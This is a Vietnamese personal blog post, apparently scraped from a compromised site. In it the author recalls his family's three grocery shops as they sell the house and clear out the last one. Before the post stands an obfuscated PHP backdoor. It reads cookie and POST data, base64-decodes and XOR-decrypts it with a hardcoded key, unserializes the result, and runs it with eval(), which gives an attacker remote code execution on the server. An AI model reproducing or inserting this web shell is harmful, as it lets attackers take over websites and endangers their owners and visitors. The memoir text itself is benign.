$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Cửa hàng tạp hoá – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Cửa hàng tạp hoá

Cửa hàng tạp hoá

(hình ảnh chỉ mang tính minh hoạ – kết quả đầu tiên tìm thấy trên Google với từ khoá “cửa hàng tạp hoá”)

Hôm nay ông cụ ở nhà nhờ in hai tờ giấy A4 chỉ vỏn vẹn vài chữ: NHÀ BÁN, Xin L/L: xxx.xxx.xxxx

Khi in hai tờ giấy ấy, anh chẳng có cảm giác gì khác ngoài tiếng máy in kim (mua từ năm 1998) sao mà kêu to quá, làm chẳng thể nào tập trung đọc sách được. Cho đến chiều nay, sau khi ních no căng bụng một tô bún bò giò heo và một li chè đậu xanh đánh ngoài chợ, anh lò dò bước về nhà.

Nhìn thấy hai tờ giấy mà chính tay mình in (thực ra là nhấn lệnh Print, chứ anh không phải máy in, phỏng ạ!), treo trước “ngôi nhà
của mình”, lần đầu tiên anh ý thức được bốn chữ “ngôi nhà của mình”. Bảy năm đã trôi qua kể từ khi anh chuyển từ một ngôi nhà trong hẻm cụt sâu ơi là sâu về ngôi nhà hiện tại, cũng trong hẻm nhưng không sâu lắm *cười*.

Ấn tượng sâu nhất của anh về ngôi nhà có lẽ, à không, phải dùng từ chắn chắn, là hình ảnh đám tang của bà nội anh, vào một buổi sớm tinh mơ. Khi đấy, trên đường đưa quan tài của bà từ nhà thờ ra nghĩa trang, khi người ta khiêng bà ngang qua nhà, họ dừng lại, và quay đầu về phía cửa nhà, nhún một cái. Hai cụ nhà anh giải thích, ấy là bà đang chào ngôi nhà – nơi bà sống những năm cuối đời, lần cuối cùng. Khi ấy, trong anh có gì đấy nghèn nghẹn…

Anh đang nằm dài, vừa dùng đôi bàn tay thon dài và đẹp vô cùng của mình (chấp các thể loại gái đọ ngón tay với anh ấy *chớp mắt*) gõ những dòng này, vừa mơ màng nghe các bạn cũ của anh là The Carpenters chơi lại bài Yesterday once more ((anh nghe ở link này http://mp3.zing.vn/mp3/nghe-bai-hat/Yesterday-Once-More-The-Carpenters.IW60C7B0.html)). Kí ức của anh lại quay về những thời xa xưa ấy.

Nếu anh còn đang cắp sách tới trường, và lại nếu một lần nữa, đây là bài tập làm văn, thì chắc chắn anh sẽ ăn quả điểm dưới trung bình ngay. Tiêu đề anh nói về một thứ, đoạn trên anh viết về một thứ, và đoạn dưới đây anh lại viết về cái mà tiêu đề anh đã nhắc. Nhưng đấy chỉ là nếu, anh viết ở đây ứ phải là tập làm văn, và cũng chẳng có ông thầy bà cô nào vào đây chấm điểm anh. Nên anh tha hồ mà viết những gì anh thích thôi nhỉ?

Anh biết đến cụm từ “cửa hàng tạp hoá” từ khi anh còn rất nhỏ, đâu chừng hai hay ba tuổi gì đấy. Các nhà khoa học lỗi lạc hình như đã từng kết luận rằng trẻ em dưới ba tuổi thì sẽ chẳng nhớ được gì. Anh thì anh không chắc về điều này lắm.

Ngày ấy, bà cụ nhà anh bán tạp hoá ở một cái cửa hàng to nhất ở huyện anh và cả vài huyện lân cận. Anh không biết suốt thời niên thiếu của 4C ((các cô các chú)), 4C thích gì nhất. Có thể đấy là khi đi mẫu giáo được con bé xinh xinh tóc cột đuôi gà (anh thấy truyện nó hay mô tả thế) kiss một cái vào má, hoặc giả học ngoan cuối tuần được bố mẹ dắt đi công viên chơi. Riêng đối với anh, ngày nhỏ, anh thích nhất là tối được ngủ ở cửa hàng tạp hoá đấy.

Ngày ấy (vẫn là cái ngày mà anh nhắc ở đoạn trên), bà cụ lâu lâu một tay dắt anh, một tay bế con em gái anh đi bộ từ nhà ở trong khu xóm, ra cửa hàng tạp hoá ở gần đường lộ để ngủ lại. Anh rất thích cái cảm giác ngủ trong cửa hàng, mặc dù phải nói là cực kì chật chội, đôi khi đầu và chân phải gác lên những kiện hàng. Nhưng anh còn nhớ, đó là những khoảng thời gian mà trước lúc ngủ, anh thoả sức vui đùa với những món đồ chơi cụ nhà bán. Đó là con chó gục gặc đầu (mà giờ đây các bác tài xế hay để trước xe), hay các con thú mà nhấn công tắc, nó sẽ tự động làm những hành động đã được lập trình trước. Và anh dần dần đi vào giấc ngủ, giữa cái thú vui nho nhỏ ấy, cùng tiếng bánh xe thỉnh thoảng nghiến ken két khi chạy ngang trên đường lộ, đôi khi là tiếng chít chít của bọn chuột nhắt chạy loạn lên.

Ngày ấy (khỏi nhắc nữa nhé), thỉnh thoảng những ngày ngủ ở cửa hàng, vào buổi sáng sớm, khi mà không gian vẫn còn cực kì yên ắng, tiết trời lạnh đến run cả người, anh theo cụ nhà ra đường lộ chờ xe chở hàng. Khi chiếc xe chở hàng tới, khi cánh cửa xe mở ra, từng thùng hàng được thả xuống, anh leo vội ngay lên trên cái thùng đầu tiên rơi xuống, và nằm đấy, nhìn lên bầu trời tối mịt, đôi khi thiêm thiếp ngủ trên đó luôn. Đấy nhé, anh từ hồi còn rất nhỏ đã có cái thú vui tao nhã là nằm dài ra và ngắm bầu trời đầy sao. Anh đồ rằng bọn phim ảnh, truyện tranh, những cảnh sến tương tự ấy là bắt chước từ anh *cười*. À, thú vị nữa là nằm giữa đường nhé. Anh cũng chẳng hiểu có phải là lúc đấy tầm 3, 4h sáng, chẳng có ai nên xe tải mới thả hàng ngay giữa đường không. Cơ mà giờ bảo làm lại, đố anh dám. Có lẽ càng lớn lên, mọi thứ của con người đều phát triển, duy chỉ có lá gan là bé đi.

Khi anh học hết lớp 5, hai cụ nhà anh quyết định phải chuyển nhà lên Sài Gòn. Hai cụ bỏ qua việc buôn bán hết sức thuận lợi, bỏ mặc lời khuyên của bạn bè hàng xóm chỉ vì một câu cho bọn trẻ có tương lai. Lên đây, giữa một thành phố đầy nhộn nhịp và mang hơi thở công nghiệp, hai cụ nhà anh không biết làm nghề gì ngoài việc bán tạp hoá.

Cửa hàng tạp hoá thứ hai của nhà anh, là một ki-ốt trong chợ. Anh thật sự không ấn tượng với nó lắm, có lẽ do anh ít khi ghé vào chơi. Hoặc là ngược lại.

Tới khi anh học lớp 9, nghĩa là tầm năm 2001, hai cụ quyết định mua căn nhà hiện tại, tầng dưới làm chỗ buôn bán, 3 tầng trên để ở. Ừ, và đây là cửa hàng tạp hoá thứ ba của nhà anh.

Việc sống trong một cửa hàng tạp hoá như thế nào? Đấy là một trải nghiệm, mà thật ra, ở đời, có cái quái gì chẳng phải trải nghiệm đâu chứ. Không thể phủ nhận đôi khi anh hơi thấy bực mình vì nhà quá chật, không thể để đủ xe khi bạn bè đến chơi. Không thể phủ nhận, có những lần anh nhìn vào các căn nhà của bọn bạn mà có cảm giác ghen tị. Không thể chối rằng, anh từng ước hai cụ nhà anh làm việc gì khác kiếm được nhiều tiền hơn, để cho anh tiền tiêu nhiều nhiều xíu, để anh có thể ăn xài thoải mái hơn. Đến giờ, khi anh một phần có thể kiếm được chút tiền, chỉ ít thôi, từ việc đi làm thêm của mình, thì anh mới thấy ngày đấy anh quả là một đứa trẻ con *e thẹn*.

Hôm nay, song song với việc đề bảng bán nhà, cụ nhà anh thanh lí toàn bộ hàng hoá, tủ kệ. Anh vừa khênh cái tủ to kềnh càng, vốn để trưng bày dầu gội đầu và sữa tắm sang nhà một bà bạn hàng của mẹ. Khi về nhà, nhìn vào căn nhà trống trải, đúng như hồi đấy anh từng thích, anh lại thấy thiếu vắng một điều gì đó…

Cửa hàng tạp hoá, nó là một phần kí ức – tuổi thơ – tuổi dậy thì và cả tuổi trưởng thành của anh. Nó là tất cả những gì mà hai cụ nhà anh có thể làm, và đã làm, để mang lại cho anh một “tương lai tốt hơn” đúng như lời hai cụ. Và vì thế, cứ coi như đây là bài mà anh cảm ơn nó, không vì gì cũng được, mà nói là vì tất cả cũng được.

Yesterday once more, huh?

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.